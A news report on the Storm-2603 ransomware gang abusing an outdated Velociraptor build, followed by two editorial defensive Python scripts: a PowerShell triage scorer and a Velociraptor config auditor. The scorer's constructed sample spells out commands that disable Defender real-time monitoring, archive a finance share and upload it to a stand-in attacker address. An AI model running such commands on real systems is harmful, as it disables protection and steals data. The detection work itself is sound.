The ransomware gang caught exploiting Microsoft SharePoint zero-days over the summer has added a new tool to its arsenal: Velociraptor, an open-source digital forensics and incident response app not previously tied to ransomware incidents.
In August, Cisco’s Talos incident response team dealt with a ransomware attack in which the criminals deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines and Windows servers, and used Velociraptor to maintain stealthy access while they encrypted the victim organization’s files.
“Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603,” Talos’ researchers Michael Szeliga, Aliza Johnson, and Jaeson Schultz said in a Thursday threat report.
Possible PRC ties
Storm-2603 is a newish crew that first emerged in July after Microsoft caught the criminals abusing vulnerable on-premises SharePoint servers to deploy ransomware. At the time, Redmond said it suspected the criminals were based in China, although they were not necessarily a government-backed group.
However, in a separate report published this month, anti-ransomware firm Halcyon said Storm-2603 has “some ties to Chinese nation-state actors,” and is the same group also tracked as Warlock and CL-CRI-1040, as well as being a LockBit affiliate.
The gang typically uses Warlock and LockBit ransomware in its attacks, although this is the first time it’s deployed Babuk malware, according to Talos. And if using three ransomware variants to infect one victim sounds like overkill: that’s another Storm-2603 hallmark.
“It is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603,” the Talos team wrote.
Velociraptor is a legitimate software tool used by network defenders for threat hunting and incident response. It uses agents deployed across Windows, Linux, and macOS endpoints to continuously collect data and monitor for suspicious activity that could indicate a security incident.
And, much like other open-source and commercial software products, Velociraptor has now been repurposed by criminals for use in their operations. Because it’s a legitimate product and not malware, it’s harder to detect and block with antivirus or security tools.
In this particular attack, Velociraptor played a “significant role,” according to Talos.
After breaking into the network, Storm-2603 installed an outdated build of Velociraptor (version 0.73.4.0) that is affected by CVE-2025-6264, a privilege escalation vulnerability that can lead to arbitrary command execution and endpoint takeover. Because the tool is legitimate, it let the intruders blend in with defenders' own tooling while they exploited the hole and deployed LockBit and Babuk.
Likely initial access via SharePoint bugs
“While Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the ToolShell vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation,” the researchers said.
After installing Velociraptor on multiple servers to maintain persistence, the attackers executed a command to run smbexec, a Python script shipped with Impacket that executes programs on a remote host over the SMB protocol by creating a temporary Windows service.
Storm-2603 also modified Active Directory group policy to turn off Windows Defender's "real-time protection," the feature that continually scans endpoints for malware, and to disable its behavior monitoring and file monitoring as well.
Then they deployed a fileless PowerShell script with encryption functionality – this is what Talos believes to be the primary encryptor that deployed mass encryption on the Windows machines.
Additionally, Talos found ransomware executables on Windows machines that were identified by EDR products as LockBit, and encrypted files with the Warlock extension “xlockxlock.”
“There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with ‘.babyk’. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting,” the researchers said.
The criminals conducted a double-extortion attack, using a PowerShell script to exfiltrate data before encrypting systems. The exfiltration script sets "$ProgressPreference" to "SilentlyContinue," which suppresses PowerShell's progress bar so that anyone watching the console sees no visual sign of the copy in progress. Note that the setting does nothing to hide the script from script-block logging or EDR telemetry, and admins routinely use it to speed up cmdlets such as Invoke-WebRequest, so on its own it is a weak indicator; it matters in combination with the archive-and-upload activity around it.
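As an added illustration (not Talos's captured script, and not a published detection rule), the scoring logic below shows how the exfiltration and defence-evasion hallmarks described above can be combined into a single triage check over PowerShell script-block text: progress-bar suppression alone scores low because it is benign in most scripts, while an archive-and-upload pair or a Defender switch-off pushes the block over the alert threshold. The sample script blocks, the indicator list and the weights are constructed for the example.

```python
"""Triage PowerShell script-block text for the hallmarks described in the
article: $ProgressPreference suppression, archive creation, an HTTP upload,
and disabling Microsoft Defender real-time protection.

Indicator regexes, weights, threshold and sample scripts are all constructed
for this example; they are not a published rule set.
"""
import re

# (name, regex, weight).  Weights are an editorial choice: progress
# suppression is common in benign scripts, so it contributes little on its
# own; switching Defender off is damning enough to alert by itself.
INDICATORS = [
    ("progress_suppressed", r"\$ProgressPreference\s*=\s*['\"]?SilentlyContinue", 1),
    ("archive", r"\b(Compress-Archive|7z(\.exe)?\s+a\b|rar(\.exe)?\s+a\b)", 2),
    ("upload", r"(Invoke-WebRequest|Invoke-RestMethod|curl(\.exe)?)[^\n]*"
               r"(-Method\s+(Put|Post)|-InFile|\s-T\s|--upload-file)", 3),
    ("defender_off", r"Set-MpPreference\b[^\n]*"
                     r"-Disable(RealtimeMonitoring|BehaviorMonitoring|IOAVProtection)", 5),
]

# archive + upload (5) or defender_off (5) fires; progress + upload (4) does not.
THRESHOLD = 5


def score(script_text, indicators=INDICATORS):
    """Return (total_weight, [indicator names present]) for one script block."""
    hits = [name for name, rx, _ in indicators
            if re.search(rx, script_text, re.IGNORECASE | re.MULTILINE)]
    total = sum(w for name, _, w in indicators if name in hits)
    return total, hits


def triage(script_text, threshold=THRESHOLD):
    """Score a script block and decide whether it crosses the alert threshold."""
    total, hits = score(script_text)
    return {"score": total, "hits": hits, "alert": total >= threshold}


# Constructed sample: a routine installer download that also suppresses the
# progress bar, which is exactly the benign case the threshold must tolerate.
BENIGN = r"""
$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri https://updates.example/agent.msi -OutFile C:\Temp\agent.msi
"""

# Constructed sample: the pattern the article describes, with a TEST-NET
# address standing in for the attacker's upload server.
SUSPECT = r"""
$ProgressPreference = "SilentlyContinue"
Set-MpPreference -DisableRealtimeMonitoring $true
Compress-Archive -Path 'C:\Shares\Finance\*' -DestinationPath C:\Windows\Temp\f.zip
Invoke-RestMethod -Uri https://203.0.113.10/up -Method Put -InFile C:\Windows\Temp\f.zip
"""

if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage(text))
```

Feed this the `ScriptBlockText` field of Windows PowerShell event 4104 (script-block logging must be enabled for that field to exist); the weights are deliberately simple so that the trade-off between the benign and suspicious cases is visible, and they should be tuned against your own fleet's script corpus before being trusted.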
To avoid becoming Storm-2603’s next victim, make sure your organization has patched the SharePoint vulnerabilities, as it appears that the ransomware gang continues to abuse these holes for initial access.
Additionally, Rapid7, which maintains Velociraptor, has published recommendations on how to detect the tool’s misuse, so give that a read, too. ®
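As an added example (this is editorial code, not Rapid7's guidance or Velociraptor's own tooling), the audit below captures two of the checks a defender would want after reading this story: whether a Velociraptor client on a host is older than the build that fixed CVE-2025-6264, and whether it reports to a server the organization actually owns. The config is taken as an already-loaded dict in the shape `yaml.safe_load` produces from a Velociraptor client config; the key names `Client.server_urls` and `version.version`, the assumption that 0.74.3 is the first fixed release, and both sample configs are assumptions or constructed for illustration and should be checked against the Rapid7 advisory and a real client.yaml.

```python
"""Audit Velociraptor client configs for an outdated build and for a server
the organization does not own.

Assumptions (verify before relying on them): the key layout
Client.server_urls / version.version matches a real client config, and
CVE-2025-6264 is fixed from Velociraptor 0.74.3 onward.  Sample configs
below are constructed, not captured from any incident.
"""
import re
from urllib.parse import urlsplit

# Assumption: first release carrying the CVE-2025-6264 fix (see Rapid7 advisory).
FIXED_VERSION = "0.74.3"


def parse_version(text):
    """'0.73.4.0' -> (0, 73, 4, 0); tolerates a leading 'v' and trailing tags."""
    m = re.match(r"v?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def version_lt(a, b):
    """True if version string a is older than b, padding short tuples with zeros."""
    ta, tb = parse_version(a), parse_version(b)
    width = max(len(ta), len(tb))
    return ta + (0,) * (width - len(ta)) < tb + (0,) * (width - len(tb))


def audit_client(config, allowed_servers, fixed_version=FIXED_VERSION):
    """Return a list of human-readable findings for one client config dict.

    allowed_servers: set of hostnames the org's Velociraptor frontends use.
    An empty list means the client looks like one of ours on a patched build.
    """
    findings = []

    version = (config.get("version") or {}).get("version", "")
    if not version:
        findings.append("no version recorded in config")
    elif version_lt(version, fixed_version):
        findings.append(
            f"outdated client {version} (< {fixed_version}, CVE-2025-6264 range)")

    urls = (config.get("Client") or {}).get("server_urls") or []
    if not urls:
        findings.append("no server_urls: client is not enrolled with any server we know")
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        if host not in allowed_servers:
            findings.append(f"client reports to unknown server {url}")
    return findings


# Constructed samples.  203.0.113.10 is a documentation address standing in
# for an attacker-controlled frontend.
ALLOWED = {"velo.corp.example"}
LEGIT = {
    "version": {"name": "velociraptor", "version": "0.74.3"},
    "Client": {"server_urls": ["https://velo.corp.example:8000/"]},
}
ROGUE = {
    "version": {"name": "velociraptor", "version": "0.73.4.0"},
    "Client": {"server_urls": ["https://203.0.113.10:8000/"]},
}

if __name__ == "__main__":
    for label, cfg in (("legit", LEGIT), ("rogue", ROGUE)):
        print(label, audit_client(cfg, ALLOWED) or ["ok"])
```

In practice the config comes from the client's install directory or from the Velociraptor service's command line on each host; run this across an inventory and any client pointing at a hostname outside your allowlist deserves the same treatment as an unknown RMM agent, whatever its version.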